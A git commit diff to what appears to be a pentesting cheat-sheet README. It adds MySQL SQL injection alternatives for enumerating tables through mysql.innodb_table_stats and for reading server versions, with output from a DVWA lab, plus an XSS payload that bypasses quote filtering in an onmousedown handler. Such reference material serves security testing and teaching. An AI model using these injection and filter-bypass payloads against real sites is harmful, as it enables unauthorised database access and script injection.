Update SQL injection with Information.schema alternatives

2024-12-18 18:36:10 +00:00 · 2017-02-06 09:50:13 +01:00 · 2017-02-06 09:50:13 +01:00 · 23f00b55d5
commit 23f00b55d5
parent c9e13fcc36
2 changed files with 52 additions and 0 deletions
--- a/injection/README.md
+++ b/injection/README.md
@ -232,6 +232,50 @@ OR    -> ||
 WHERE -> HAVING
 ```

+Information_schema.tables Alternative
+```
+select * from mysql.innodb_table_stats;
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
+| database_name  | table_name            | last_update         | n_rows | clustered_index_size | sum_of_other_index_sizes |
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
+| dvwa           | guestbook             | 2017-01-19 21:02:57 |      0 |                    1 |                        0 |
+| dvwa           | users                 | 2017-01-19 21:03:07 |      5 |                    1 |                        0 |
+...
+----------------+-----------------------+---------------------+--------+----------------------+--------------------------+
+
+mysql> show tables in dvwa;
+----------------+
+| Tables_in_dvwa |
+----------------+
+| guestbook      |
+| users          |
+----------------+
+
+```
+
+Version Alternative
+```
+mysql> select @@innodb_version;
+------------------+
+| @@innodb_version |
+------------------+
+| 5.6.31           |
+------------------+
+
+mysql> select @@version;
+-------------------------+
+| @@version               |
+-------------------------+
+| 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+
+
+mysql> mysql> select version();
+-------------------------+
+| version()               |
+-------------------------+
+| 5.6.31-0ubuntu0.15.10.1 |
+-------------------------+
+```



@ -239,6 +283,7 @@ WHERE -> HAVING
 * MySQL:
  - [PentestMonkey's mySQL injection cheat sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet)
  - [Reiners mySQL injection Filter Evasion Cheatsheet] (https://websec.wordpress.com/2010/12/04/sqli-filter-evasion-cheat-sheet-mysql/)
+  - [Alternative for Information_Schema.Tables in MySQL](https://osandamalith.com/2017/02/03/alternative-for-information_schema-tables-in-mysql/)
 * MSQQL:
  - [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (http://evilsql.com/main/page2.php)
  - [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
--- a/injection/README.md
+++ b/injection/README.md
@ -378,6 +378,13 @@ http://localhost/bla.php?test=</script><script>alert(1)</script>
 </html>
 ```

+Bypass quotes in mousedown event
+```
+<a href="" onmousedown="var name = '&#39;;alert(1)//'; alert('smthg')">Link</a>
+
+You can bypass a single quote with &#39; in an on mousedown event handler
+```
+
 Bypass dot filter 
 ```
 <script>window['alert'](document['domain'])<script>